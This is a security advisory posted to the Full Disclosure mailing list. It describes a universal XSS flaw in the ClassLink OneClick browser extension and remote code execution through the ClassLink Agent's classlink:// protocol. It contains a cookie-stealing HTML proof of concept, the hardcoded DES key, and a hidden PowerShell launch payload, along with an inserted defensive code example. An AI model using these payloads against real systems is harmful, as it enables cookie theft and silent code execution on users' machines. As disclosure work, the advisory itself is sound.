Full Disclosure mailing list archives

ClassLink browser extension vulnerable to UXSS; ClassLink Agent vulnerable to Remote Code Execution.


From: EdTech Secure via Fulldisclosure <fulldisclosure () seclists org>
Date: Thu, 07 Jun 2018 16:16:33 -0400

The ClassLink OneClick Browser Extension and the ClassLink Agent are vulnerable to Universal XSS and Remote Code 
Execution respectively. The vendor released software updates fixing both vulnerabilities on 3 June 2018.

=== Vendor ===
ClassLink: https://www.classlink.com

=== Vulnerability #1: Universal XSS through the OneClick Extension ===

To log users into websites, the ClassLink OneClick Extension injects JavaScript into the target webpage to perform the 
login. To begin this flow, a user visits a page that contains metadata about the target and the JavaScript to be 
injected. This page is not authenticated, which means it can be trivially forged by an attacker.

The extension only looks for URLs that contain the string "browsersso/". If that is found, it looks in the "head" tag 
for a login_url and scripts, such as pre_auth_script. None of these fields or the page itself are authenticated in any 
way.

An attacker could create a page that contains the correct string in the URL and include a script that goes to any 
website, and execute JavaScript to steal information such as cookies, API keys, saved credentials or any private 
information. This could then be posted to the attacker's server. A user simply visiting the page would trigger the 
attack.

Here is a simple proof of concept:

<!doctype>
<html>
  <head>
    <title>.</title>
    <script type="text">
      appResponse: var x = {}; x.selectors = []; x.userauth = []; x.login_url = "https://google.com";; x.pre_auth_script 
= "alert('XSS running on Google. document.cookie = ' + document.cookie)"; x,
      gwstokenMd5: x,
    </script>
  </head>
  <body>.</body>
</html>

If this page is hosted at any URL that contains "browsersso/" and is visited by a user with the ClassLink OneClick 
Extension installed, the extension will automatically navigate to Google and show an alert box containing the user's 
current cookie on https://google.com, with no user interaction. A malicious script could, instead, post this or any 
other private information on the page to a remote server.
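The root cause above is that a substring match on the URL is being used as a trust decision. The following is an added example (not ClassLink's code) that reproduces that weak check next to the check a defender would want: HTTPS only, an allowlisted origin as the trust anchor, and "browsersso" matched as a real path segment. The allowlisted origin and the sample URLs are placeholders constructed for the example, not real ClassLink hosts.

```javascript
// Added example, not ClassLink's code. The extension described above treats any
// URL containing "browsersso/" as a trusted SSO page. isSsoPageWeak() reproduces
// that substring check; isSsoPageStrict() is the defender's version.
// TRUSTED_SSO_ORIGINS holds a placeholder origin, not a real vendor host.
const TRUSTED_SSO_ORIGINS = new Set(["https://sso.example-vendor.test"]);

// The weak check: any URL, any scheme, any origin, as long as the substring appears.
function isSsoPageWeak(url) {
  return url.includes("browsersso/");
}

// The strict check: parse the URL, require HTTPS, require an allowlisted origin,
// and only then look for "browsersso" as an actual path segment.
function isSsoPageStrict(url, trusted = TRUSTED_SSO_ORIGINS) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch {
    return false; // unparseable input is never an SSO page
  }
  if (parsed.protocol !== "https:") return false; // no plain HTTP
  if (!trusted.has(parsed.origin)) return false; // origin is the trust anchor
  // Segment match, so "?next=browsersso/" or "/notbrowsersso/" do not qualify.
  return parsed.pathname.split("/").includes("browsersso");
}

// Run both checks over a batch of URLs and report which checker accepts each one.
function classify(urls) {
  return urls.map((u) => ({ url: u, weak: isSsoPageWeak(u), strict: isSsoPageStrict(u) }));
}

// Constructed sample URLs for the example (not taken from the advisory).
const SAMPLE_URLS = [
  "https://sso.example-vendor.test/browsersso/launch", // legitimate page
  "https://attacker.example.test/browsersso/fake.html", // forged page on another origin
  "https://attacker.example.test/?next=browsersso/", // substring only in the query string
  "http://sso.example-vendor.test/browsersso/launch", // right host, wrong scheme
];

for (const r of classify(SAMPLE_URLS)) console.log(r);
```

Only the first sample is accepted by the strict check; the weak check accepts all four, which is exactly the gap the advisory describes. Note that an origin allowlist only authenticates where the page came from; the data inside it (login_url, pre_auth_script) should still be fetched from, or signed by, the vendor rather than trusted because the page URL looked right.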

=== Vulnerability #2: Remote Code Execution Using classlink:// URL Protocol ===

The classlink:// URL protocol allows links to launch executables or open files on the system. This protocol is enabled 
by installing the ClassLink Agent.

The links contain a JSON-encoded payload encrypted with DES in ECB mode under a static symmetric key, "234hyg32", 
hardcoded into the executable. The payload is not authenticated.

Because the payload is not authenticated in any way (the encryption does not function as authentication in this 
context), it can be arbitrarily modified. Since these URLs can launch executables with arbitrary parameters, this is 
trivially leveraged into remote code execution via PowerShell or other scripting environments included in Windows. 
For example, consider the following payload:

{
    "LocalAppLaunchType": "localapp",
    "path": [
        "%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    ],
    "param": "-exec\" bypass -windowstyle hidden -c 
\"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); 
[System.Windows.Forms.MessageBox]::Show('This is an code execution proof on concept. The current logged in user is ' + 
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name)",
    "ignorepath": 0
}

This shows a proof of concept that runs a PowerShell command that will show the currently logged in user in a message 
box. This example payload can be encoded into the following URL, which will execute if clicked:

classlink:?token=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

Alternatively, this link can be clicked automatically with JavaScript, so that visiting a web page is all that is 
required to trigger it. This example can be modified to run any command, such as downloading another executable from 
a remote source and executing it, allowing for the silent installation of malware just by visiting an attacker 
controlled webpage.

Additionally, the encryption used for the payload is not adequate by modern standards. Single DES is a deprecated 
standard and was withdrawn from recommended use in October 1999. ECB mode allows for a large number of attacks 
against the encrypted data itself. The key size and character set also do not provide enough entropy to be 
sufficiently strong: a simple brute force on a modest machine could recover the key in approximately 24 hours.

=== Timeline ===

April 14th, 2018 - Reached out to vendor
May 7th, 2018 - Reply from vendor, sent disclosure
May 8th, 2018 - Vendor verified the issue and began working on a fix
June 3rd, 2018 - Vendor confirmed fixes have been released

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

